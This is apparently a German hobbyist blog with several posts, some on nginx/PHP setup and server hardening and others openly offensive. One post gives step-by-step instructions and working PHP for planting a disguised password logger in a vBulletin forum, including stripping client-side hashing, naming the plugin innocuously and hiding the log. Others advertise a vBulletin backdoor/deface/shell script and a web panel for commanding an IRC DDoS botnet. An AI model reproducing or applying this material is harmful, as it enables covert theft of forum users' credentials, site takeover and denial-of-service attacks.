vBulletin „Hack“-Script

Hallo,

hatte mal wieder ein wenig langeweile und habe ein kleines „Hack“-Script – wenn man es denn so nennen darf – für vBulletin geschrieben. Eigentlich sollte es nur eine kleine Erweiterung für den Passwordlogger sein, aber es wurde dann doch etwas mehr.
How to:
– Bringt das Script auf den Server
oder
– Versucht an die MySQL Daten zu gelangen und versucht eine Verbindung von einem externen Server aufzubauen.

Funktionen:

  • Backdoor (Superadmin) einrichten
  • Installieren des Passwordstealers
  • Query
  • Custom File erstellen
  • Shell that server! (BETA)
  • Deface (Text, Aussehen kann selber bestimmt werden)
  • Download:
    Klick mich

    Advertisements

    Hinterlasse einen Kommentar

    vBulletin Passwordlogger

    Hallo,
    habe eben in 5 Minuten ein Script geschrieben, was wie ein Passwordstealer für vBulletin funktioniert 😉 Bedingung ist, dass ihr einen Adminacc habt, der Rechte hat, Templates zu ändern und Plugins zu erstellen.

    Zuerst geht ihr in die Style-Einstellungen und editiert das Template bei dem das Loginfeld ist (ist bei manchen Styles unterschiedlich, normalerweise „header“ oder „navbar“)

    Dort sucht ihr folgende Zeile:
    onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, $show[nopasswordempty])"
    und entfernt sie. Das sorgt dafür, dass das Passwortfeld ausgelesen werden kann.

    Nun müssen wir einen Hook erstellen. Klickt unten auf Addons & Plugins und dann auf „Plugin hinzufügen“.

    Der Titel ist egal, sollte aber möglichst unauffällig sein. Sowas wie „Cache Management“ wäre zum Beispiel besser als „R0FL PaZZWorDLoGGaaa“.
    Als Einstiegspunkt wählt ihr login_redirect.
    Der PHP Code der nun noch hinzugefügt werden muss sieht wie folgt aus:
    $pass = $_POST['vb_login_password'];
    $username = $_POST['vb_login_username'];
    $write = $username.':'.$pass.'
    ';
    $connection = fopen('cache.log', 'a+');
    fwrite($connection, $write);
    fclose($connection);

    Es wird nun username:pass in eine cache.log auf dem Server geschrieben.
    Ihr könnt das natürlich noch modifizieren, indem ihr Pfad usw anpasst. Wäre auch ratsam, die Datei weiter im System zu verstecken.

    Getestet mit vBulletin 3.7.* und 3.8.*

    MfG

    Hinterlasse einen Kommentar

    Underground IRC Connector

    Hallo,

    dieses „Tool“ – wie ich es nun mal bezeichne – habe ich vor längerer Zeit einmal geschrieben. Es erlaubt euch, euren IRC Bot als Webpanel Bot zu nutzen. Der „Underground IRC Connector“ verbindet sich mit eurem IRC Server und ihr könnt die Befehle bequem über ein Webpanel versenden.

    Das Script ist noch im BETA-Status. Bugs sind mir bislang keine bekannt, aber ihr könnt mich gerne kontaktieren, falls ihr einen findet. Bitte auch dazu schreiben, welchern Webserver und welche PHP Version ihr benutzt!

    In der aktuellen Version könnt ihr die Befehle für DDoS, Download und Update über die „config.php“ anpassen. (Bevor Fragen auftauchen: $lc steht für location ;)) Das Script wurde für den Hustla Bot optimiert, funktioniert aber auch mit allen andereren Bots.

    Download

    Eventuell werde ich nochmal ein Update rausbringen, habe aber eigenlich nicht vor, dass Projekt weiterzuführen.

    MfG

    Hinterlasse einen Kommentar

    nginx und der 502 Bad Gateway/The page your are looking for….

    Das oben genannte Problem tritt leider häufig auf und manche Leute sind einfach ratlos, wo denn das Problem liegt.

    Sollte ein 502 Bad Gateway oder (wenn in der nginx.conf definiert) ein The page you are looking for is temporarily unavailable. kommen, hängt das damit zusammen, dass sich der Spawn-FCGI Prozess beendet hat. Nicht, weil er abgestürzt ist, sondern weil nginx einen zu großen Memory Leak vorraussieht.

    Das Problem lässt sich sehr leicht fixxen, indem man die Anzahl der Spawn-FCGI Prozesse erhöht.

    Dies kann man mit den Parametern -F und -C realisieren. Bei 2 Prozessen (das reicht vollkommen)
    /usr/local/bin/spawn-fcgi -F 2 -C 2 -a 127.0.0.1 -p 9000 -u www-data -g www-data -f /usr/bin/php5-cgi -P /var/run/fastcgi-php.pid
    Eventuell musst ihr an dieser Stelle den Pfad anpassen!
    Die Prozesse mit diesem Befehl starten und auch in die rc.local (Autostart) eintragen!

    Hinterlasse einen Kommentar

    nginx + PHP5 unter Debian

    Die Wahl eines Webservers gestaltet sich oft als schwierig. Oftmals wird der Apache-Webserver genutzt, welcher allerdings große Hardwareanforderungen stellt. Für kleinere bzw schwächere Server eignet sich besonders der „nginx“ Webserver. Ein absolutes Leichtgewicht!
    Wie ihr diesen plus PHP5 unter Debian/Ubuntu installieren könnt, werde ich in diesem Tutorial zeigen.

     

     

    Zuerst einmal laden wir uns die aktuelle stable-Version von der Website runter.

    wget http://nginx.org/download/nginx-0.8.52.tar.gz

    und anschließend entpacken mit Hilfe von
    tar xfvz nginx-0.8.52.tar.gz

    Die Dateien welche im Archiv waren werden nun in das Verzeichnis nginx-0.8.52 entpackt.
    Wechseln wir nun in das Verzeichnis indem wir folgenden Befehl eingeben
    cd nginx-0.8.52

    Anschließend bereiten wir die Installation vor
    ./configure
    Sollte ein Fehler auftreten, dass eine Bibliothek fehlt, dann diese einfach nachinstallieren. Bei mir zum Beispiel kam der Fehler, dass die PCRE Library fehlt.

    Die Installation nun mit
    make
    fortsetzen.
    Anschließend noch
    make install und alles ist erledigt 😉 nginx wurde nun in /usr/local/nginx installiert.

    Jetzt wechseln wir wieder mit Hilfe des „cd“-Befehls in das Verzeichnis /usr/local/nginx/sbin/
    cd /usr/local/nginx/sbin
    Von hier aus können wir den Server starten
    ./nginx.

    Ruft nun mal euren Server auf und es sollte folgendes kommen 😉
    null

    Das war der erste Schritt, machen wir uns nun an die Installation von php.
    Um php auf nginx zum Laufen zu bekommen benötigen wir FastCGI.
    Dazu installieren wir nun erstmal alle wichtigen PHP-Module, damit du später nichts mehr nachinstallieren musst 😉
    apt-get install php5-cgi php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-mhash php5-ming php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl

    Anschließend müssen wir die php.ini bearbeiten
    nano /etc/php5/cgi/php.ini
    und folgende Zeile am Ende hinzufügen.
    cgi.fix_pathinfo = 1

    Machen wir uns nun an das Paket spawn-fcgi. Dazu hätten wir nun zwei Möglichkeiten.
    Die erste wäre, einfach Lighttpd zu installieren, weil dieser das spawn-fcgi Paket schon hat oder wir kompilieren uns es selber, was ich jetzt tun werde 😉

    wget http://www.lighttpd.net/download/spawn-fcgi-1.6.3.tar.gz
    tar xfvz spawn-fcgi-1.6.3.tar.gz
    cd spawn-fcgi-1.6.3
    ./configure
    make
    make install
    Und das wars ;D

    Nun starten wir noch den Daemon
    spawn-fcgi -a 127.0.0.1 -p 9000 -u www-data -g www-data -f /usr/bin/php5-cgi -P /var/run/fastcgi-php.pid

    Das ganze ist natürlich ein bisschen blöd, wenn man das jedes mal beim Start eingeben muss, deswegen tragen wir spawn-fcgi in den Autostart ein.
    nano /etc/rc.local
    und diese Zeile vor dem exit eintragen:
    /usr/local/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u www-data -g www-data -f /usr/bin/php5-cgi -P /var/run/fastcgi-php.pid

    Das einzige was wir jetzt noch machen müssen ist die nginx.conf anpassen.
    nano /usr/local/nginx/conf/nginx.conf

    Die # vor
    location ~ \.php$ {
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /usr/local/nginx/html$fastcgi_script_name;
    include fastcgi_params;
    }

    entfernen und diese Zeilen so anpassen, wie ich es gemacht habe.

    Anschließend müssen wir nur noch einen restart durchführen.
    /usr/local/nginx/sbin/nginx -s reload
    Und php funktioniert 😉
    Zum Test können wir ja eine test-Datei machen mit folgendem Inhalt.
    <?php
    phpinfo();
    ?>

    Das Verzeichnis, wo alle Dateien reinkommen, die über das Web erreichbar sein sollen ist /usr/local/nginx/html.

    Hinterlasse einen Kommentar

    Der erste (v)Server

    Glückwunsch, du hast es geschafft! – ein eigener Server, mit dem du alles machen kannst was du willst, zumindest fast.

    Nunja, wie auch immer. Es gibt eine Menge zu beachten bei einem Server, vor allem im Punkto Sicherheit. – Dir ist sicherlich bewusst, dass ein Server oft eine Bandbreite von 100Mbit oder mehr hat. Dass das eine ganze Menge ist im Gegensatz du den üblichen DSL Leitungen muss man glaube ich nicht erwähnen. Eine solch schnelle Leitung ist gut für Besucher deiner Website, da sie dort keine Laggs bemerken werden, allerdings ist diese auch für Hacker interessant. Mit ihnen kann man Warez down- oder uploaden, den Server als schnellen Proxy nutzen oder sogar Websiten attackieren.

    Damit sowas mit deinem Server nicht passiert ist es besonders wichtig, dass du ihn absicherst. Dabei gibt es grundlegende Dinge, die zu beachten sind:

    • Halte deine Betriebssystem immer aktuell
    • Benutze sichere Passwörter für SSH, FTP, etc
    • Installiere ausschließlich Software, von der du weißt, dass sie keine Backdoors o.ä. enthält
    • Gib deine Serverdaten nicht weiter
    • Limitiere die Anmeldungsversuche

    Wie ihr das alles bewerkstelligen könnt und noch vieles mehr werde ich euch in diesem Blog zeigen 🙂

    MfG

    crashme

    Hinterlasse einen Kommentar